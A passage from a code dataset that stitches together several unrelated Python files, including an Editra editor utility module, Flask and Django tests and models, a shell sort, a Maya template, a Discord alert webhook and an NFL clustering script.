been loaded yet and # there is something in the system clipboard if self.GetCurrentSize() == 0: txt = GetClipboardText() if txt is not None: self.Put(txt) return super(EdClipboard, self).GetNext() def IsAtIndex(self, txt): """Is the passed in phrase at the current cycle index in the cache. Used to check if index should be reset or to continue in the cycle. @param txt: selected text """ pre = self.PeekPrev() next = self.PeekNext() if txt in (pre, next): return True else: return False def Put(self, txt): """Put some text in the clipboard @param txt: Text to put in the system clipboard """ pre = self.PeekPrev() next = self.PeekNext() if len(txt) and txt not in (pre, next): self.PutItem(txt) #---- Misc Common Function Library ----# # Used for holding the primary selection on mac/msw FAKE_CLIPBOARD = None def GetClipboardText(primary=False): """Get the primary selection from the clipboard if there is one @return: str or None """ if primary and wx.Platform == '__WXGTK__': wx.TheClipboard.UsePrimarySelection(True) elif primary: # Fake the primary selection on mac/msw global FAKE_CLIPBOARD return FAKE_CLIPBOARD else: pass text_obj = wx.TextDataObject() rtxt = None if wx.TheClipboard.IsOpened() or wx.TheClipboard.Open(): if wx.TheClipboard.GetData(text_obj): rtxt = text_obj.GetText() wx.TheClipboard.Close() if primary and wx.Platform == '__WXGTK__': wx.TheClipboard.UsePrimarySelection(False) return rtxt def SetClipboardText(txt, primary=False): """Copies text to the clipboard @param txt: text to put in clipboard @keyword primary: Set txt as primary selection (x11) """ # Check if using primary selection if primary and wx.Platform == '__WXGTK__': wx.TheClipboard.UsePrimarySelection(True) elif primary: # Fake the primary selection on mac/msw global FAKE_CLIPBOARD FAKE_CLIPBOARD = txt return True else: pass data_o = wx.TextDataObject() data_o.SetText(txt) if wx.TheClipboard.IsOpened() or wx.TheClipboard.Open(): wx.TheClipboard.SetData(data_o) wx.TheClipboard.Close() if primary and wx.Platform == '__WXGTK__': wx.TheClipboard.UsePrimarySelection(False) return True else: return False def FilterFiles(file_list): """Filters a list of paths and returns a list of paths that can probably be opened in the editor. @param file_list: list of files/folders to filter for good files in """ good = list() checker = ebmlib.FileTypeChecker() for path in file_list: if not checker.IsBinary(path): good.append(path) return good def GetFileType(fname): """Get what the type of the file is as Editra sees it in a formatted string. @param fname: file path @return: string (formatted/translated filetype) """ if os.path.isdir(fname): return _("Folder") eguess = syntax.GetTypeFromExt(fname.split('.')[-1]) if eguess == synglob.LANG_TXT and fname.split('.')[-1] == 'txt': return _("Text Document") elif eguess == synglob.LANG_TXT: mtype = mimetypes.guess_type(fname)[0] if mtype is not None: return mtype else: return _("Unknown") else: return _("%s Source File") % eguess def GetFileReader(file_name, enc='utf-8'): """Returns a file stream reader object for reading the supplied file name. It returns a file reader using the encoding (enc) which defaults to utf-8. If lookup of the reader fails on the host system it will return an ascii reader. If there is an error in creating the file reader the function will return a negative number. @param file_name: name of file to get a reader for @keyword enc: encoding to use for reading the file @return file reader, or int if error. """ try: file_h = file(file_name, "rb") except (IOError, OSError): dev_tool.DEBUGP("[file_reader] Failed to open file %s" % file_name) return -1 try: reader = codecs.getreader(enc)(file_h) except (LookupError, IndexError, ValueError): dev_tool.DEBUGP('[file_reader] Failed to get %s Reader' % enc) reader = file_h return reader def GetFileWriter(file_name, enc='utf-8'): """Returns a file stream writer object for reading the supplied file name. It returns a file writer in the supplied encoding if the host system supports it other wise it will return an ascii reader. The default will try and return a utf-8 reader. If there is an error in creating the file reader the function will return a negative number. @param file_name: path of file to get writer for @keyword enc: encoding to write text to file with """ try: file_h = open(file_name, "wb") except IOError: dev_tool.DEBUGP("[file_writer][err] Failed to open file %s" % file_name) return -1 try: writer = codecs.getwriter(enc)(file_h) except (LookupError, IndexError, ValueError): dev_tool.DEBUGP('[file_writer][err] Failed to get %s Writer' % enc) writer = file_h return writer # TODO: DEPRECATED - remove once callers migrate to ebmlib GetFileManagerCmd = ebmlib.GetFileManagerCmd def GetUserConfigBase(): """Get the base user configuration directory path""" cbase = ed_glob.CONFIG['CONFIG_BASE'] if cbase is None: cbase = wx.StandardPaths_Get().GetUserDataDir() if wx.Platform == '__WXGTK__': if u'.config' not in cbase and not os.path.exists(cbase): # If no existing configuration return xdg config path base, cfgdir = os.path.split(cbase) tmp_path = os.path.join(base, '.config') if os.path.exists(tmp_path): cbase = os.path.join(tmp_path, cfgdir.lstrip(u'.')) return cbase + os.sep def HasConfigDir(loc=u""): """ Checks if the user has a config directory and returns True if the config directory exists or False if it does not. @return: whether config dir in question exists on an expected path """ cbase = GetUserConfigBase() to_check = os.path.join(cbase, loc) return os.path.exists(to_check) def MakeConfigDir(name): """Makes a user config directory @param name: name of config directory to make in user config dir """ cbase = GetUserConfigBase() try: os.mkdir(cbase + name) except (OSError, IOError): pass def RepairConfigState(path): """Repair the state of profile path, updating and creating it it does not exist. @param path: path of profile """ if os.path.isabs(path) and os.path.exists(path): return path else: # Need to fix some stuff up CreateConfigDir() import profiler return profiler.Profile_Get("MYPROFILE") def CreateConfigDir(): """ Creates the user config directory its default sub directories and any of the default config files. @postcondition: all default configuration files/folders are created """ #---- Resolve Paths ----# config_dir = GetUserConfigBase() profile_dir = os.path.join(config_dir, u"profiles") dest_file = os.path.join(profile_dir, u"default.ppb") ext_cfg = [u"cache", u"styles", u"plugins"] #---- Create Directories ----# if not os.path.exists(config_dir): os.mkdir(config_dir) if not os.path.exists(profile_dir): os.mkdir(profile_dir) for cfg in ext_cfg: if not HasConfigDir(cfg): MakeConfigDir(cfg) import profiler profiler.TheProfile.LoadDefaults() profiler.Profile_Set("MYPROFILE", dest_file) profiler.TheProfile.Write(dest_file) profiler.UpdateProfileLoader() def ResolvConfigDir(config_dir, sys_only=False): """Checks for a user config directory and if it is not found it then resolves the absolute path of the executables directory from the relative execution path. This is then used to find the location of the specified directory as it relates to the executable directory, and returns that path as a string. @param config_dir: name of config directory to resolve @keyword sys_only: only get paths of system config directory or user one @note: This method is probably much more complex than it needs to be but the code has proven itself. """ # Try to get a User config directory if not sys_only: user_config = GetUserConfigBase() user_config = os.path.join(user_config, config_dir) if os.path.exists(user_config): return user_config + os.sep # Check if the system install path has already been resolved once before if ed_glob.CONFIG['INSTALL_DIR'] != u"": tmp = os.path.join(ed_glob.CONFIG['INSTALL_DIR'], config_dir) tmp = os.path.normpath(tmp) + os.sep if os.path.exists(tmp): return tmp else: del tmp # The following lines are used only when Editra is being run as a # source package. If the found path does not exist then Editra is # running as as a built package. if not hasattr(sys, 'frozen'): path = __file__ if not ebmlib.IsUnicode(path): path = path.decode(sys.getfilesystemencoding()) path = os.sep.join(path.split(os.sep)[:-2]) path = path + os.sep + config_dir + os.sep if os.path.exists(path): if not ebmlib.IsUnicode(path): path = unicode(path, sys.getfilesystemencoding()) return path # If we get here we need to do some platform dependent lookup # to find everything. path = sys.argv[0] if not ebmlib.IsUnicode(path): path = unicode(path, sys.getfilesystemencoding()) # If it is a link get the real path if os.path.islink(path): path = os.path.realpath(path) # Tokenize path pieces = path.split(os.sep) if wx.Platform == u'__WXMSW__': # On Windows the exe is in same dir as config directories pro_path = os.sep.join(pieces[:-1]) if os.path.isabs(pro_path): pass elif pro_path == u"": pro_path = os.getcwd() pieces = pro_path.split(os.sep) pro_path = os.sep.join(pieces[:-1]) else: pro_path = os.path.abspath(pro_path) elif wx.Platform == u'__WXMAC__': # On OS X the config directories are in the applet under Resources stdpath = wx.StandardPaths_Get() pro_path = stdpath.GetResourcesDir() pro_path = os.path.join(pro_path, config_dir) else: pro_path = os.sep.join(pieces[:-2]) if pro_path.startswith(os.sep): pass elif pro_path == u"": pro_path = os.getcwd() pieces = pro_path.split(os.sep) if pieces[-1] not in [ed_glob.PROG_NAME.lower(), ed_glob.PROG_NAME]: pro_path = os.sep.join(pieces[:-1]) else: pro_path = os.path.abspath(pro_path) if wx.Platform != u'__WXMAC__': pro_path = pro_path + os.sep + config_dir + os.sep path = os.path.normpath(pro_path) + os.sep # Make sure path is unicode if not ebmlib.IsUnicode(path): path = unicode(path, sys.getdefaultencoding()) return path def GetResources(resource): """Returns a list of resource directories from a given toplevel config dir @param resource: config directory name @return: list of resource directory that exist under the given resource path """ rec_dir = ResolvConfigDir(resource) if os.path.exists(rec_dir): rec_lst = [ rec.title() for rec in os.listdir(rec_dir) if os.path.isdir(rec_dir + rec) and rec[0] != u"." ] return rec_lst else: return -1 def GetResourceFiles(resource, trim=True, get_all=False, suffix=None, title=True): """Gets a list of resource files from a directory and trims the file extentions from the names if trim is set to True (default). If the get_all parameter is set to True the function will return a set of unique items by looking up both the user and system level files and combining them, the default behavior returns the user level files if they exist or the system level files if the user ones do not exist. @param resource: name of config directory to look in (i.e cache) @keyword trim: trim file extensions or not @keyword get_all: get a set of both system/user files or just user level @keyword suffix: Get files that have the specified suffix or all (default) @keyword title: Titlize the results """ rec_dir = ResolvConfigDir(resource) if get_all: rec_dir2 = ResolvConfigDir(resource, True) rec_list = list() if not os.path.exists(rec_dir): return -1 else: recs = os.listdir(rec_dir) if get_all and os.path.exists(rec_dir2): recs.extend(os.listdir(rec_dir2)) for rec in recs: if os.path.isfile(rec_dir + rec) or \ (get_all and os.path.isfile(rec_dir2 + rec)): # If a suffix was specified only keep files that match if suffix is not None: if not rec.endswith(suffix): continue # Trim the last part of an extension if one exists if trim: rec = ".".join(rec.split(u".")[:-1]).strip() # Make the resource name a title if requested if title and len(rec): rec = rec[0].upper() + rec[1:] if len(rec): rec_list.append(rec) rec_list.sort() return list(set(rec_list)) def GetAllEncodings(): """Get all encodings found on the system @return: list of strings """ elist = encodings.aliases.aliases.values() elist = list(set(elist)) elist.sort() elist = [ enc for enc in elist if not enc.endswith('codec') ] return elist def Log(msg, *args): """Push the message to the apps log @param msg: message string to log @param args: optional positional arguments to use as a printf formatting to the message. """ try: wx.GetApp().GetLog()(msg, args) except: pass def GetProxyOpener(proxy_set): """Get a urlopener for use with a proxy @param proxy_set: proxy settings to use """ Log("[util][info] Making proxy opener with %s" % str(proxy_set)) proxy_info = dict(proxy_set) auth_str = "%(uname)s:%(passwd)s@%(url)s" url = proxy_info['url'] if url.startswith('http://'): auth_str = "http://" + auth_str proxy_info['url'] = url.replace('http://', '') else: pass if len(proxy_info.get('port', '')): auth_str = auth_str + ":%(port)s" proxy_info['passwd'] = ed_crypt.Decrypt(proxy_info['passwd'], proxy_info['pid']) Log("[util][info] Formatted proxy request: %s" % \ (auth_str.replace('%(passwd)s', '****') % proxy_info)) proxy = urllib2.ProxyHandler({"http" : auth_str % proxy_info}) opener = urllib2.build_opener(proxy, urllib2.HTTPHandler) return opener #---- GUI helper functions ----# def SetWindowIcon(window): """Sets the given windows icon to be the programs application icon. @param window: window to set app icon for """ try: if wx.Platform == "__WXMSW__": ed_icon = ed_glob.CONFIG['SYSPIX_DIR'] + u"editra.ico" window.SetIcon(wx.Icon(ed_icon, wx.BITMAP_TYPE_ICO)) else: ed_icon = ed_glob.CONFIG['SYSPIX_DIR'] + u"editra.png" window.SetIcon(wx.Icon(ed_icon, wx.BITMAP_TYPE_PNG)) finally: pass #-----------------------------------------------------------------------------# class IntValidator(wx.PyValidator): """A Generic integer validator""" def __init__(self, min_=0, max_=0): """Initialize the validator @keyword min_: min value to accept @keyword max_: max value to accept """ wx.PyValidator.__init__(self) self._min = min_ self._max = max_ # Event management self.Bind(wx.EVT_CHAR, self.OnChar) def Clone(self): """Clones the current validator @return: clone of this object """ return IntValidator(self._min, self._max) def Validate(self, win): """Validate an window value @param win: window to validate """ val = win.GetValue() return val.isdigit() def OnChar(self, event): """Process values as they are entered into the control @param event: event that called this handler """ key = event.GetKeyCode() if key < wx.WXK_SPACE or key == wx.WXK_DELETE or \ key > 255 or chr(key) in '0123456789': event.Skip() return if not wx.Validator_IsSilent(): wx.Bell() return
2.234375
2
genrl/environments/vec_env/utils.py
matrig/genrl
390
16756
from typing import Tuple import torch class RunningMeanStd: """ Utility Function to compute a running mean and variance calculator :param epsilon: Small number to prevent division by zero for calculations :param shape: Shape of the RMS object :type epsilon: float :type shape: Tuple """ def __init__(self, epsilon: float = 1e-4, shape: Tuple = ()): self.mean = torch.zeros(shape).double() self.var = torch.ones(shape).double() self.count = epsilon def update(self, batch: torch.Tensor): batch_mean = torch.mean(batch, axis=0) batch_var = torch.var(batch, axis=0) batch_count = batch.shape[0] total_count = self.count + batch_count delta = batch_mean - self.mean new_mean = self.mean + delta * batch_count / total_count M2 = ( self.var * self.count + batch_var * batch_count + (delta ** 2) * self.count * batch_count / total_count ) self.mean = new_mean self.var = M2 / (total_count - 1) self.count = total_count
3.0625
3
releases/pota-windows-1.3-ai5.0.2.0/ae/aiPotaTemplate.py
sumitneup/pota
0
16757
import mtoa.ui.ae.templates as templates import pymel.core as pm import maya.cmds as cmds import mtoa.ui.ae.utils as aeUtils class aiPotaTemplate(templates.AttributeTemplate): """ def filenameEditBokeh(self, mData) : attr = self.nodeAttr('aiBokehEXRPath') cmds.setAttr(attr,mData,type="string") def LoadFilenameButtonPushBokeh(self, *args): basicFilter = 'All Files (*.*)' ret = cmds.fileDialog2(fileFilter=basicFilter, dialogStyle=2, cap='Select sample_bokeh file location',fm=0) if ret is not None and len(ret): self.filenameEditBokeh(ret[0]) cmds.textFieldButtonGrp("filenameBokehGrp", edit=True, text=ret[0]) def filenameNewBokeh(self, nodeName): path = cmds.textFieldButtonGrp("filenameBokehGrp", label="Bokeh AOV EXR path", changeCommand=self.filenameEditBokeh, width=300) cmds.textFieldButtonGrp(path, edit=True, text=cmds.getAttr(nodeName)) cmds.textFieldButtonGrp(path, edit=True, buttonLabel="...", buttonCommand=self.LoadFilenameButtonPushBokeh) def filenameReplaceBokeh(self, nodeName): cmds.textFieldButtonGrp("filenameBokehGrp", edit=True, text=cmds.getAttr(nodeName) ) """ def setup(self): self.beginLayout("Polynomial Optics", collapse=False) self.addControl("aiLensModel", label="Lens Model") self.addControl("aiSensorWidth", label="Sensor Width (mm)") self.addControl("aiWavelength", label="Wavelength (nm)") self.addControl("aiDof", label="Enable depth of field") self.addControl("aiFstop", label="F-stop") self.addControl("aiFocalDistance", label="Focus distance (cm)") self.addControl("aiExtraSensorShift", label="Extra Sensor shift (mm)") self.addControl("aiVignettingRetries", label="Vignetting retries") self.addControl("aiApertureBlades", label="Aperture blades") self.addControl("aiProperRayDerivatives", label="Proper Ray Derivatives") # add these in the aovshader template instead # self.suppress('normalCamera') # self.suppress('hardwareColor') self.endLayout() """ self.addSeparator() self.addSeparator() self.addSeparator() self.addSeparator() self.addSeparator() self.addSeparator() self.beginLayout("AOV shader", collapse=False) self.addControl("aiBackwardSamples", label="Backwards samples") self.addControl("aiMinimumRgb", label="Minimum RGB") self.addCustom("aiBokehEXRPath", self.filenameNewBokeh, self.filenameReplaceBokeh) self.endLayout() """ templates.registerTranslatorUI(aiPotaTemplate, "camera", "pota")
2.21875
2
tests/test_user.py
munniomer/Send-IT-Api-v1
0
16758
import unittest from app import create_app import json from tests.basetest import BaseTest class TestUSer(BaseTest): """User tests class""" def test_user_registration(self): "tests if new user can register" respon = self.client.post("/api/v1/user/register", json=self.new_user) self.assertEqual(respon.status_code, 201) def test_if_name_city_valid(self): """Tests if names and city are valid""" respon = self.client.post( "/api/v1/user/register", json=self.new_user1, content_type='application/json') self.assertEqual(respon.status_code, 400) self.assertIn('PLease check if your fname, lname or city is empty or contains numbers', str(respon.data)) def test_if_email_valid(self): """Tests if email is valid""" respon = self.client.post( "/api/v1/user/register", json=self.new_user2, content_type='application/json') self.assertEqual(respon.status_code, 400) self.assertIn('Please enter a valid emai', str(respon.data)) def test_if_email_exist(self): """Tests if email is valid""" self.client.post( "/api/v1/user/register", json=self.new_user6, content_type='application/json') respon = self.client.post( "/api/v1/user/register", json=self.new_user6, content_type='application/json') self.assertEqual(respon.status_code, 400) self.assertIn('That email exists. use a unique email', str(respon.data)) def test_if_phone_valid(self): """Tests if email is exists""" respon = self.client.post( "/api/v1/user/register", json=self.new_user3, content_type='application/json') self.assertEqual(respon.status_code, 400) self.assertIn('Please enter a valid phone number ', str(respon.data)) def test_if_password_valid(self): """Tests if passwords are empty or less than 3""" respon = self.client.post( "/api/v1/user/register", json=self.new_user4, content_type='application/json') self.assertEqual(respon.status_code, 400) self.assertIn('Please check if your password or confirm password are empty or less than 3', str(respon.data)) def test_if_password_match(self): """Tests if passwords match""" respon = self.client.post( "/api/v1/user/register", json=self.new_user5, content_type='application/json') self.assertEqual(respon.status_code, 400) self.assertIn('confirm password does not match password', str(respon.data))
3.421875
3
authors/apps/profiles/migrations/0023_auto_20190124_1222.py
andela/ah-django-unchained
0
16759
<reponame>andela/ah-django-unchained # Generated by Django 2.1.4 on 2019-01-24 12:22 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('profiles', '0022_auto_20190123_1211'), ] operations = [ migrations.AlterField( model_name='userprofile', name='first_name', field=models.CharField(blank=True, max_length=100), ), migrations.AlterField( model_name='userprofile', name='last_name', field=models.CharField(blank=True, max_length=100), ), ]
1.742188
2
Algorithm/ShellSort/pyShellSort.py
commanderHR1/algorithms
1
16760
# Implementation of Shell Sort algorithm in Python def shellSort(arr): interval = 1 # Initializes interval while (interval < (len(arr) // 3)): interval = (interval * 3) + 1 while (interval > 0): for i in range(interval, len(arr)): # Select val to be inserted val = arr[i] j = i # Shift element right while ((j > interval - 1) and (arr[j - interval] >= val)): arr[j] = arr[j - interval] j -= interval # Insert val at hole position arr[j] = val # Calculate interval interval = (interval - 1) / 3 l = [4, 1, 2, 5, 3] print("Initial list: " + str(l)) shellSort(l) print("Sorted list: " + str(l))
4.34375
4
photos/models.py
benjaminbills/galleria
0
16761
<reponame>benjaminbills/galleria from django.db import models # Create your models here. class Image(models.Model): name = models.CharField(max_length=255) posted_date = models.DateTimeField(auto_now_add=True) image_description = models.CharField(max_length=500, default='DEFAULT VALUE') image = models.ImageField(upload_to='images/', blank=True) location = models.ForeignKey('Location', on_delete=models.CASCADE, default=0) category = models.ForeignKey('Category', on_delete=models.CASCADE, default=0) def __str__(self): return self.name def save_image(self): self.save() def delete_image(self): self.delete() @classmethod def update_image(cls,image_id): image=cls.objects.filter(pk=image_id) image.update() return image @classmethod def search_by_category(cls,search_term): images = cls.objects.filter(category__name__contains=search_term) return images @classmethod def search_by_location(cls,search_term): images = cls.objects.filter(location__name__contains=search_term) return images @classmethod def get_image_by_id(cls,id): image=cls.objects.get(id=id) return image class Location(models.Model): name = models.CharField(max_length=255) #magic method def __str__(self): return self.name def save_location(self): self.save() def delete_location(self): self.delete() @classmethod def update_location(cls, id, name): location = cls.objects.filter(pk=id).update(name=name) return location class Category(models.Model): name = models.CharField(max_length=255) #magic method def __str__(self): return self.name def save_category(self): self.save() def delete_category(self): self.delete() @classmethod def update_category(cls, id, name): category = cls.objects.filter(pk=id).update(name=name) return category
2.375
2
main.py
kramrm/gcf-alerting-discord
0
16762
import base64 import json from webhook import post_webhook from datetime import datetime def hello_pubsub(event, context): """Triggered from a message on a Cloud Pub/Sub topic. Args: event (dict): Event payload. context (google.cloud.functions.Context): Metadata for the event. """ pubsub_message = base64.b64decode(event['data']).decode('utf-8') #post_webhook(message=f'{pubsub_message}', timestamp='now', status='status', title='title') message = json.loads(pubsub_message) message = message['incident'] #post_webhook(message, timestamp, status, title='Monitoring'): null = None status = 'Status' log_message = '' title = 'Monitoring Alert' status = message['state'].title() timestamp = datetime.utcfromtimestamp(message["started_at"]).isoformat() log_message += f'Started: {timestamp} UTC' color = 16772608 if message['ended_at'] is not None: timestamp = datetime.utcfromtimestamp(message["ended_at"]).isoformat() log_message += f'\nEnded: {timestamp} UTC' color = 65297 title = message['policy_name'] log_message += f'\n{message["summary"]}' log_message += f'\n[Monitor Event]({message["url"]})' post_webhook(message=log_message, timestamp=timestamp, status=status, title=title, color=color)
2.671875
3
libzyre.py
brettviren/wafit
0
16763
<reponame>brettviren/wafit #!/usr/bin/env waf ''' This is a wafit tool for using zyre ''' import util def options(opt): opt.load("libczmq") util.generic_options(opt, "libzyre", libs=False) def configure(cfg): cfg.load("libczmq") util.generic_configure_incs(cfg, "libzyre", "zyre.h", "libczmq") util.generic_configure_libs(cfg, "libzyre", "zyre", "libczmq")
1.398438
1
scripts/run-gmm.py
vr100/nfl-kaggle
0
16764
import argparse, os, fnmatch, json, joblib import pandas as pd from sklearn.mixture import GaussianMixture from sklearn.metrics import adjusted_rand_score # Reference paper - https://arxiv.org/abs/1906.11373 # "Unsupervised Methods for Identifying Pass Coverage Among Defensive Backs with NFL Player Tracking Data" STATS_PREFIX = "week" SKIP_COLS_KEY = "global_skip_cols" ONLY_CLOSEST_KEY = "only_closest" CLOSE_TO_BR_KEY = "close_to_br" SELECT_GROUP_KEY = "select_group_by" GROUP_BY = ["gameId", "playId"] MAX_COL = "closest_frames" def run_gmm_for_g_and_k(file_data, g, k, skip_cols, only_closest, close_to_br): file_count = len(file_data) data = pd.DataFrame() for j in range(file_count): if j == k: continue data = data.append(file_data[j], ignore_index=True) if only_closest == 1: data = data.loc[data.groupby(GROUP_BY)[MAX_COL].idxmax()].reset_index( drop=True) elif len(close_to_br) != 0: data = data[data[CLOSE_TO_BR_KEY].isin(close_to_br)] x = data.drop(skip_cols, axis = 1).dropna() gmm = GaussianMixture(n_components=g, covariance_type="full", max_iter=1000) gmm = gmm.fit(x) x_k = file_data[k].drop(skip_cols, axis = 1).dropna() gmm_k = GaussianMixture(n_components=g, covariance_type="full", max_iter=1000) gmm_k = gmm_k.fit(x_k) # predict cluster for the k week on both models y = gmm.predict(x_k) y_k = gmm_k.predict(x_k) ari = adjusted_rand_score(y, y_k) # return the computed ari and gmm (skipping k) return (ari, gmm) def run_gmm_for_group_count(file_data, group_count, config): print("Running gmm for group count {}".format(group_count)) ari = [] gmm = [] file_count = len(file_data) for k in range(file_count): # print("Running gmm by leaving out index {}".format(k)) (ari_k, gmm_k) = run_gmm_for_g_and_k(file_data, group_count, k, config[SKIP_COLS_KEY], config[ONLY_CLOSEST_KEY], config[CLOSE_TO_BR_KEY]) ari.append(ari_k) gmm.append(gmm_k) ari_max_index = ari.index(max(ari)) ari_max = ari[ari_max_index] gmm_max = gmm[ari_max_index] ari_sum = sum(ari) result = { "lowo_index": ari_max_index, "max_ari": ari_max, "total_ari": ari_sum, "gmm": gmm_max } return result def run_gmm_feature_influence(file_data, group_count, skip_lowo, config): print("Running gmm for group {}, skipping lowo index: {}".format( group_count, skip_lowo)) if len(file_data) == 0: return global_skip_cols = config[SKIP_COLS_KEY] cols = set(file_data[0].columns) - set(global_skip_cols) result = {} for c in cols: print("Skipping feature {}".format(c)) skip_cols = global_skip_cols + [c] ari_c, gmm_c = run_gmm_for_g_and_k(file_data, group_count, skip_lowo, skip_cols, config[ONLY_CLOSEST_KEY], config[CLOSE_TO_BR_KEY]) result[c] = { "ari": ari_c, "gmm": gmm_c } return result def save_results(output_folder, gmms, selected_g, influence_aris, config): groups = sorted(gmms.keys()) gmm_result = {} for g in groups: gmm_result[g] = {k: gmms[g][k] for k in gmms[g].keys() - {"gmm"}} selected_result = { **gmm_result[selected_g] } selected_result["group_count"] = selected_g selected_result["selection_key"] = config[SELECT_GROUP_KEY] if config[ONLY_CLOSEST_KEY] == 1: selected_result[ONLY_CLOSEST_KEY] = config[ONLY_CLOSEST_KEY] else: selected_result[CLOSE_TO_BR_KEY] = config[CLOSE_TO_BR_KEY] influence_result = { "group_count": selected_g, "lowo_index": selected_result["lowo_index"], "ari_with_all_features": selected_result["max_ari"] } feature_result = {} influences = {} ari_with_all = selected_result["max_ari"] for feature in influence_aris: ari = influence_aris[feature]["ari"] influences[feature] = { "influence": ari_with_all - ari, "ari": ari } feature_result = dict(sorted(influences.items(), key=lambda item: item[1]["influence"], reverse=True)) influence_result["feature_data"] = feature_result output = { "group_data": gmm_result, "selected_group": selected_result, "feature_influence": influence_result } output_path = os.path.join(output_folder, "results.json") json_data = json.dumps(output, indent=2) with open(output_path, "w") as output_file: output_file.write(json_data) print("Result saved to {}".format(output_path)) output_path = os.path.join(output_folder, "config.json") json_data = json.dumps(config, indent=2) with open(output_path, "w") as output_file: output_file.write(json_data) print("Config saved to {}".format(output_path)) selected_gmm = gmms[selected_g]["gmm"] gmm_path = os.path.join(output_folder, "gmm.joblib") joblib.dump(selected_gmm, gmm_path) print("GMM model saved to {}".format(gmm_path)) def run_gmm(data_folder, output_folder, config): stats_files = fnmatch.filter(os.listdir(data_folder), "{}*.csv".format( STATS_PREFIX)) file_data = [] for sf in stats_files: print("Working on file {} ...".format(sf)) input_file = os.path.join(data_folder, sf) stats_data = pd.read_csv(input_file) file_data.append(stats_data) gmm_groups = {} for g in range(config["group_min"], config["group_max"] + 1): result = run_gmm_for_group_count(file_data, g, config) gmm_groups[g] = result group_key = config[SELECT_GROUP_KEY] selected_group = max(gmm_groups, key= lambda x: gmm_groups[x][group_key]) gmm_influence_result = run_gmm_feature_influence(file_data, selected_group, gmm_groups[selected_group]["lowo_index"], config) save_results(output_folder, gmm_groups, selected_group, gmm_influence_result, config) def parse_args(): parser = argparse.ArgumentParser() parser.add_argument( "--data_path", type=str, help="specifies the folder containing data files", required=True) parser.add_argument( "--config_path", type=str, help="specifies the json config file", required=True) parser.add_argument( "--output_path", type=str, help="specifies the output folder path", required=True) return vars(parser.parse_args()) def main(): args = parse_args() print("Args: {}".format(args)) data_path = os.path.abspath(args["data_path"]) config_path = os.path.abspath(args["config_path"]) output_path = os.path.abspath(args["output_path"]) with open(config_path) as f: config = json.load(f) print("Config: {}".format(config)) run_gmm(data_path, output_path, config) main()
2.359375
2
module01/classes/class06b.py
LauroHBrant/python-course
2
16765
from style import blue, none n = input(f'Type {blue}something{none}: ') print(f'{blue}{n.isnumeric()}')
3.09375
3
custom_components/panasonic_cc/__init__.py
shyne99/panasonic_cc
0
16766
<reponame>shyne99/panasonic_cc<filename>custom_components/panasonic_cc/__init__.py """Platform for the Panasonic Comfort Cloud.""" from datetime import timedelta import logging from typing import Any, Dict import asyncio from async_timeout import timeout import voluptuous as vol from homeassistant.core import HomeAssistant from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry from homeassistant.const import ( CONF_USERNAME, CONF_PASSWORD) from homeassistant.exceptions import ConfigEntryNotReady import homeassistant.helpers.config_validation as cv from homeassistant.helpers.typing import HomeAssistantType from homeassistant.helpers import discovery from .const import TIMEOUT from .panasonic import PanasonicApiDevice _LOGGER = logging.getLogger(__name__) DOMAIN = "panasonic_cc" CONFIG_SCHEMA = vol.Schema( { DOMAIN: vol.Schema( { vol.Required(CONF_USERNAME): cv.string, vol.Required(CONF_PASSWORD): cv.string, } ) }, extra=vol.ALLOW_EXTRA, ) PANASONIC_DEVICES = "panasonic_devices" COMPONENT_TYPES = ["climate", "sensor", "switch"] def setup(hass, config): pass async def async_setup(hass: HomeAssistant, config: Dict) -> bool: """Set up the Garo Wallbox component.""" hass.data.setdefault(DOMAIN, {}) return True async def async_setup_entry(hass: HomeAssistantType, entry: ConfigEntry): """Establish connection with Comfort Cloud.""" import pcomfortcloud conf = entry.data if PANASONIC_DEVICES not in hass.data: hass.data[PANASONIC_DEVICES] = [] username = conf[CONF_USERNAME] password = conf[CONF_PASSWORD] api = pcomfortcloud.Session(username, password, verifySsl=False) devices = await hass.async_add_executor_job(api.get_devices) for device in devices: try: api_device = PanasonicApiDevice(hass, api, device) await api_device.update() hass.data[PANASONIC_DEVICES].append(api_device) except Exception as e: _LOGGER.warning(f"Failed to setup device: {device['name']} ({e})") if hass.data[PANASONIC_DEVICES]: for component in COMPONENT_TYPES: hass.async_create_task( hass.config_entries.async_forward_entry_setup(entry, component) ) return True async def async_unload_entry(hass, config_entry): """Unload a config entry.""" await asyncio.wait( [ hass.config_entries.async_forward_entry_unload(config_entry, component) for component in COMPONENT_TYPES ] ) hass.data.pop(PANASONIC_DEVICES) return True
2.21875
2
django/bossingest/test/test_ingest_manager.py
jhuapl-boss/boss
20
16767
# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json from unittest.mock import patch, MagicMock from bossingest.ingest_manager import IngestManager from bossingest.models import IngestJob from bossingest.test.setup import SetupTests from bosscore.test.setup_db import SetupTestDB from bosscore.error import ErrorCodes from bosscore.lookup import LookUpKey import bossutils.aws from django.contrib.auth.models import User from ndingest.ndqueue.uploadqueue import UploadQueue from rest_framework.test import APITestCase class BossIngestManagerTest(APITestCase): def setUp(self): """ Initialize the database :return: """ dbsetup = SetupTestDB() self.user = dbsetup.create_super_user(username='testuser', email='<EMAIL>', password='<PASSWORD>') dbsetup.set_user(self.user) self.client.force_login(self.user) dbsetup.insert_ingest_test_data() setup = SetupTests() # Get the config_data for v1 schema config_data = setup.get_ingest_config_data_dict() self.example_config_data = config_data self.volumetric_config_data = setup.get_ingest_config_data_dict_volumetric() # Unit under test. self.ingest_mgr = IngestManager() def test_validate_ingest(self): """Method to test validation method""" #Validate schema and config file response = self.ingest_mgr.validate_config_file(self.example_config_data) assert (response is True) #Validate properties response = self.ingest_mgr.validate_properties() assert (response is True) def test_validate_config_file(self): """Method to test validation of a config file""" self.ingest_mgr.validate_config_file(self.example_config_data) assert(self.ingest_mgr.config is not None) assert (self.ingest_mgr.config.config_data is not None) def test_validate_properties(self): """Methos to test validation of properties of the config data""" self.ingest_mgr.validate_config_file(self.example_config_data) self.ingest_mgr.validate_properties() assert (self.ingest_mgr.collection.name == 'my_col_1') assert (self.ingest_mgr.experiment.name == 'my_exp_1') assert (self.ingest_mgr.channel.name == 'my_ch_1') def test_create_ingest_job(self): """Method to test creation of a ingest job from a config_data dict""" 